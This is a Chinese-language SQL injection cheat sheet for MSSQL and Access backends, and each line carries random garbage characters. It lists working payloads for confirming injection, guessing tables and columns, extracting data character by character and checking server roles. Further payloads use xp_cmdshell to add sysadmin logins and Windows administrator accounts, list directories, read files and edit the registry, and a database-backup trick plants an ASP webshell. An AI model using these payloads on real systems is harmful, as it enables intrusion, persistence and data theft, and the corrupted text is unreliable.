1.判断是否有注入;and 1=1 ;and 1=2 `9J9[!�+!`
2.初步判断是否是mssql ;and user>0 jBw)8~t�Ym
J}X{�8Ds9
3.注入参数是字符'and [查询条件] and ''=' ls]N�&!/hq
V<0iYi;�4=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' C�PP�~�,E_
?";��SUk�u
5.判断数据库系统 �cZ?Q�I6|[
d-�UeItyW*
;and (select count(*) from sysobjects)>0 mssql Kg$RT?q-C6
��D'#��Q`H
;and (select count(*) from msysobjects)>0 access ��1I9v`eT4
<�GN�LDpj�
;X�,u ����
�"[|b,fx�R
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e}e8WR=B�
f��q6�%@M~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ==�5F[U��X
n_�e�'n|�T
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ?W'��p&(;
3N+l�WuE}K
9.(1)猜字段的ascii值(access) �7R2O[=Szq
,��94<�j,"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <'�I["�U�m
:;7�I�_tb�
(2)猜字段的ascii值(mssql) fo@�^=-4A-
[s��{�!��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 St�-uE�|8
'+cI �W(F?
10.测试权限结构(mssql) y~
=H`P�AE
ijF_��
KP'
cq�NK`3:.j
((k"*�f2�%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- d�q[h:k�Ym
FLqN3D=y�Q
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !�LI<�%P�)
~9d��pB>+�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- RwW�g�:4��
=�^nb+}Nz(
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \�c}(��rqT
�d�w�
bR,K
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5�~JT�*�Ny
`Z?wj@H1�`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ���smQ^(S^
K� �T}����
;and 1=(select IS_MEMBER('db_owner'));-- &r5q,l&@�n
@^�W`�Yg)C
bV_nY�po��
|@Tga�_0p�
11.添加mssql和系统的帐户 '-;[8�:y.�
Z�',��!LK!
;exec master.dbo.sp_addlogin username;-- afEa@e�t�'
;exec master.dbo.sp_password null,username,password;-- fG�o4&( U
IY`p7� )#i
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �%iN>4�;T8
b��mfM�_oz
;exec master.dbo.xp_cmdshell 'net user username password V8?}I)�#(7
Tu#< �{'1$
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- W�(s4�R�,j
QU|_
r�2LM
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 9�E!l�e�=>
NK_|�h�%��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ,fVD`RR(W?
�>gk_klLh
�L�x^ eaP5
,kN;d}bg
12.(1)遍历目录 �e#(C�k�{e
��X
W�)�TI
;create table dirs(paths varchar(100), id int) Kx�__�&�a�
&XP(D5lf`B
;insert dirs exec master.dbo.xp_dirtree 'c:\' f�f"wg\O�4
t�g�K
I���
;and (select top 1 paths from dirs)>0 '�$K E=�Jy
dj0; t�Q=C
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >H2`�4]�4]
BX,)G� HE
Aw� o)a8�e
�#%0V`BS7n
(2)遍历目录 gE-�y`2S�U
#WpkL]g2+%
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z�^g�Jy,T�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1 DW�oL�}Z
���1�57_0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 P�3$�eomX'
'y8{�,�R4C
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 >:;d�NV��z
*�z=_s�D?1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 rz?Cn
�X.t
*Gbh�k8}V'
R�pHl���q
}'X=�&�3m�
13.mssql中的存储过程 &|>+�LP@�8
24mdh���T|
xp_regenumvalues 注册表根键, 子键 yB�IlwN`kB
Y?�T{>"_W
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 xvr5$�x|h�
2ej7Ql_@c
xp_regread 根键,子键,键值名 �<qCa�9@Ea
(!�os�&/",
;exec xp_regread lq/2Y4L�E)
�[m�
t.2�.
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ���pm&TH�d
--$o$�EP`
xp_regwrite 根键,子键, 值名, 值类型, 值 �1^p�/#jt�
'=\}d��av!
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 h~MV�=7
lE
�Y Y:Bw�W:
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Zo9<96I&�
JE?p�'77C�
xp_regdeletevalue 根键,子键,值名 �])x1MmRg\
�j]�a$RC�#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �� R��$a<=
=�P-�&d��N
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 `+J�Fvn��!
P:q�mg"i@3
�!*�IMWm�>
T5BZ�D
+Ta
14.mssql的backup创建webshell G7-�Be�A8
w�u�cdXj{%
use model l.[pnL���D
~xH&�"���1
create table cmd(str image); ��"(ko�R Q
��"q4tvcK.
insert into cmd(str) values (''); B���{�-7��
�D7ex{SVA)
backup database model to disk='c:\l.asp'; �cH]tZ$�E`
d�n�6B43w
nti�S7g e1
T� X�`X5j�
15.mssql内置函数 ��#m���+!<
l{3B���}_,
;and (select @@version)>0 获得Windows的版本号 t<%0��e�u|
uFd$��*`jS
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �q^@*��{H�
yoi4w� 7:�
;and (select user_name())>0 爆当前系统的连接用户 >%J�Pgr/
8
Ot�n,UoeeB
;and (select db_name())>0 得到当前连接的数据库 j�XcJ/g(X3
)n/�%�P4l�
�]n ?x tI
�
w-jE��lV
16.简洁的webshell 0�MQ= R��t
�3Jo�Y�-��
use model z(PU�oV:�?
�0oe<=L]F
create table cmd(str image); .{�Y;6]9�[
kH!Z|P�s?R
insert into cmd(str) values (''); ><%����585
�N�Oz3_�k�
backup database model to disk='g:\wwwtest\l.asp';
